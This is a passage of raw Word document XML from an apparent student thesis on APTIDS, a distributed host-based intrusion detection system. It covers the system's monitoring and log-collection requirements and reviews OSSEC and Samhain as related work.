        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be restarted, they can run with the start up. Monitoring the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allows us to capture any malicious activity and know what is happening in the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="00C352B0" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc484962982"/>
      <w:r>
        <w:t>The needs of S</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>ervice monitoring module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00F9659F" w:rsidRPr="00F9659F" w:rsidRDefault="00E41963" w:rsidP="00F9659F">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F9659F">
        <w:t xml:space="preserve"> Service allows us to create a so call long-running executable</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="00F9659F">
        <w:t>, which can start automatically at system boot</w:t>
      </w:r>
      <w:r w:rsidR="0032487F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1002975757"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:instrText xml:space="preserve"> CITATION Service \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(2)</w:t>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F9659F" w:rsidRPr="00C525C7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F9659F">
        <w:t xml:space="preserve"> Knowing that, malicious programs write entries in the Service Control Manager which help them to run their executables when system boot up. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="00C352B0" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc484962983"/>
      <w:r>
        <w:t>The needs of Distributed L</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>g Collector H</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t>ardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="003F301F" w:rsidRPr="003F301F" w:rsidRDefault="003F301F" w:rsidP="003F301F">
      <w:r>
        <w:t xml:space="preserve">The concept of this thesis is aimed to develop a solution for distributed monitoring malicious activities in a </w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>big</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scale network architecture. A distributed log collector hardware plays a role as a local centralize server</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t xml:space="preserve"> for a single LAN network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which receive the log</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>rom agents those</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run in the </w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>LAN</w:t>
      </w:r>
      <w:r>
        <w:t>. Those agent</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, when capt</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>ure any malicious activity, they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> send back their log to the log collector hardware. </w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>Each collector hardware stores log for a LAN network which can has up to hundreds</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t xml:space="preserve"> agents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="003F301F" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc484962984"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t xml:space="preserve">he needs of </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00D92C26" w:rsidRDefault="009D4270" w:rsidP="00D92C26">
      <w:r>
        <w:t>When a single log collector hardware can store log</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for hundreds</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agents, a </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can store</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> and manage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for hundred</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve">s of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A1547">
        <w:t>log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> collector hardware. Each hardware is managed by an input stream, and can be monitor using a single dashboard. A </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> a low us to monitor hundreds of thousands machine in a large network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0F" w:rsidP="00345B0F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>The needs of Forensic Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A1547" w:rsidRDefault="00345B0F" w:rsidP="00345B0F">
      <w:r>
        <w:t xml:space="preserve">In APTIDS, Sentry plays a role as an important step for protecting systems from disastrous incident when APT happens. In the Cyber Space, we have learnt that no system is safe. Any threat and any accident can happen in no delay. Protecting systems by monitoring it 24/7 is not enough, some advanced threats can easily bypass our durable shield and penetrate to compromise the network. When things get into the worst situation, our respond team use Sentry as a Forensic toolkit to identify the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00287BCD">
        <w:t xml:space="preserve"> terminate the threats before they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can spread wider along with their malicious activi</w:t>
      </w:r>
      <w:r w:rsidR="00287BCD">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4270" w:rsidRPr="00D92C26" w:rsidRDefault="009D4270" w:rsidP="00D92C26"/>
    <w:p w:rsidR="00990FA2" w:rsidRPr="00990FA2" w:rsidRDefault="00990FA2" w:rsidP="00990FA2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B23B2" w:rsidRPr="00E445CE" w:rsidRDefault="008B23B2" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc484962985"/>
      <w:r w:rsidRPr="00E445CE">
        <w:lastRenderedPageBreak/>
        <w:t>BACKGROUND AND RELATED WORKS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="006A3B63" w:rsidRPr="00E445CE">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177021" w:rsidRDefault="008B23B2" w:rsidP="008B23B2">
      <w:r>
        <w:t>In this chapter, we study some similar projects those have been developed recently</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t>. This study does not aim to compare the advantages and disadvantages of those projects, but we would like to know how other people around the world</w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t xml:space="preserve"> handle</w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t>d nowadays sophisticated</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t xml:space="preserve"> APT threats. T</w:t>
      </w:r>
      <w:r w:rsidR="00C525C7">
        <w:t>his</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t xml:space="preserve"> approach has helped us much in developing APTIDS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177021" w:rsidRDefault="00C525C7" w:rsidP="00C525C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc484962986"/>
      <w:r>
        <w:t>Related works</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00C525C7" w:rsidRDefault="00C525C7" w:rsidP="00C525C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc484962987"/>
      <w:r>
        <w:t>OSSEC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00C525C7" w:rsidRDefault="00C525C7" w:rsidP="00C525C7">
      <w:r>
        <w:t xml:space="preserve">OSSEC </w:t>
      </w:r>
      <w:r w:rsidR="00FA2604">
        <w:t xml:space="preserve">is a host-based instruction detection system (HIDS) </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="812610974"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:instrText xml:space="preserve"> CITATION Fre08 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(3)</w:t>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FA2604">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA1DEF">
        <w:t xml:space="preserve">A HIDS can work as a software that monitors events from inside the system rather than monitor the and inspect the network behaviors. Since from a viewpoint of the network, traffics that travel through network link might be encrypted and hard to be inspect. However, to OSSEC, any network traffics always </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00BA1DEF">
        <w:t xml:space="preserve"> plaintext in the system viewpoint. Furthermore, OSSEC has a very sophisticated engine that can monitor system activities for recognize and alert upon any file system change, rootkit or malware infection. OSSEC also monitors log file, capture suspicious activities</w:t>
      </w:r>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve"> happening</w:t>
      </w:r>
      <w:r w:rsidR="00BA1DEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve">in special parts of the system and alert immediately for respond team to interrupt </w:t>
      </w:r>
      <w:r w:rsidR="00896C1B">
        <w:t>and prevent the attack on time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00896C1B" w:rsidP="00896C1B">
      <w:r>
        <w:t>OSSEC comes in a deployment with two main parts: a client agent part and a command and control server part. After has been deployed in the client machine, OSSEC agent does the monitor task.</w:t>
      </w:r>
      <w:r w:rsidR="0042288E">
        <w:t xml:space="preserve"> OSSEC agent can work on multiplatform, which means we can expand its protection to any host in our ne</w:t>
      </w:r>
      <w:r w:rsidR="00FB2DC8">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0042288E">
        <w:t>work.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The agent communicates with its server at UDP protocol using port 1514. When an event is</w:t>
      </w:r>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve"> detected for which an alert to a system or security administrator needs to be sent, OSSEC can use one of several methods, including emails, SMS messages, pagers, etc </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="290561880"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:instrText xml:space="preserve"> CITATION Fre08 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(3)</w:t>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D03D21">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t>OSSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agent</w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t xml:space="preserve"> can also takes actions for preventing the attack. For example, within an DDOS attack, OSSEC can insert rule into firewall that can be used to prevent the attack immediately. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OSSEC server plays a role </w:t>
      </w:r>
      <w:r w:rsidR="008D132E">
        <w:t>as a distributed log collector</w:t>
      </w:r>
      <w:r w:rsidR="00FB778B">
        <w:t>, it store</w:t>
      </w:r>
      <w:r w:rsidR="00F85F5E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FB778B">
        <w:t xml:space="preserve"> log received from the agents and alert upon those received logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00FB778B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D03D21" w:rsidRDefault="00FB778B" w:rsidP="00896C1B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A single OSSEC server can monitor many OSSEC agents. In case we want to connect many OSSCE server together, we can configure an agent inside the server. (see Figure 2-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00FB778B" w:rsidP="00FB778B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75543857" wp14:editId="369AB9DC">
            <wp:extent cx="5581650" cy="3128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1650" cy="3128010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B41F3B" w:rsidRPr="00927DA6" w:rsidRDefault="00FB778B" w:rsidP="00927DA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc483834777"/>
      <w:bookmarkStart w:id="31" w:name="_Toc484886341"/>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: OSSEC Processes in a “Server-Agent” Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRPr="00927DA6" w:rsidRDefault="00927DA6" w:rsidP="00927DA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r w:rsidR="00FB778B" w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.ossec.net/ossec-</w:t>
      </w:r>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>docs/ossec-hids_oahmet_eng.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00955443" w:rsidP="00B41F3B">
      <w:r>
        <w:t>OSSEC Open Source Security has become and high qualit</w:t>
      </w:r>
      <w:r w:rsidR="008B6D53">
        <w:t>y Opensource Host IDS software that is trusted and used in protecting many large campuses and enterprises. Although there are few drawbacks, OSSEC has been trusted to be improved and upgrade their abilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D132E" w:rsidRDefault="008D132E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B6D53" w:rsidRDefault="00514FF3" w:rsidP="008D132E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc484962988"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Samhain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00850E34" w:rsidRDefault="00514FF3" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve">Samhain is a multi-platform, opensource HIDS for POSIX </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="330961426"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:instrText xml:space="preserve"> CITATION Nel14 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(4)</w:t>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0085113D">
        <w:t xml:space="preserve">. When </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0085113D">
        <w:t xml:space="preserve">an attacker </w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>compromises</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0085113D">
        <w:t xml:space="preserve"> to our system, he wants to modify the functions of the system to work in the wait that suitable for his purpose. Therefore, beside service and network operation, his job is to modify system files those are essential for the operation. System administrators should be alert as soon as possible upon any change in any system files.</w:t>
      </w:r>
      <w:r w:rsidR="00F85F5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0BB9" w:rsidRDefault="00F85F5E" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve">Samhain has been developed mainly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>for the purpose of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> File Integrity Monitoring (FIM).</w:t>
      </w:r>
      <w:r w:rsidR="00D56635">
        <w:t xml:space="preserve"> Like most IDS, Samhain can also be centrally managed via a web console.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Samhain has configurable rules that administrator can configure for the baseline of operations in FIM. When the rules are set, the tool then scan all the pre-defined file periodically, depends on configurations and then whether any change occurs, the tool capture it and sends alert immediately. </w:t>
      </w:r>
      <w:r w:rsidR="002D0BB9">
        <w:t>Samhain supports for various reporting options such as log file, direct e-mail or custom script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A3225" w:rsidRDefault="002D0BB9" w:rsidP="000A3225">
      <w:r>
        <w:t xml:space="preserve">There are many HIDS present on the market too day, but what makes Samhain stand out of the crowd is that Samhain focus on FIM as a point for development. Samhain does not try to become a full feature and multi-function HIDS or SIEM. Samhain’s FIM function has many features that it becomes the most popular FIM software that is trusted and used worldwide. Samhain can even be used to support the Payment Card Industry Data Security Standard (PCI DSS) </w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t>(or other compliance policies) that require the monitor of growing log files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t>To minimize the impact on the disk IO and get immediate notifications, Samhain can leverage the inotify function in Li</w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>nux kernel system. Inotify is a</w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t xml:space="preserve"> Unix API provides a mechanism for monitoring filesystem events </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1239133370"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00003BB7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:instrText xml:space="preserve"> CITATION Lin \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(5)</w:t>
          </w:r>
          <w:r w:rsidR="00003BB7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00003BB7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000A3225">
        <w:t xml:space="preserve">Samhain also implement various stealth techniques that will be used to obfuscate the binary and configuration data. Further obfuscation could be implement in case an attacker gets on to the system without let him know FIM is running. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85F5E" w:rsidRPr="00850E34" w:rsidRDefault="000A3225" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D0BB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F85F5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00095BB2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B6D53" w:rsidRDefault="00095BB2" w:rsidP="00095BB2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc484962989"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00AC6729" w:rsidRDefault="00E41963" w:rsidP="00AC6729">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc484962990"/>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00AC6729">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="007A6F8C" w:rsidRPr="007A6F8C" w:rsidRDefault="007A6F8C" w:rsidP="007A6F8C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7F94" w:rsidRDefault="00E41963" w:rsidP="002B7F94">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve"> is a hierarchical database that contains critical data for the operation of </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="007A6F8C">
        <w:t xml:space="preserve"> systems  </w:t>
      </w:r>
      <w:sdt>
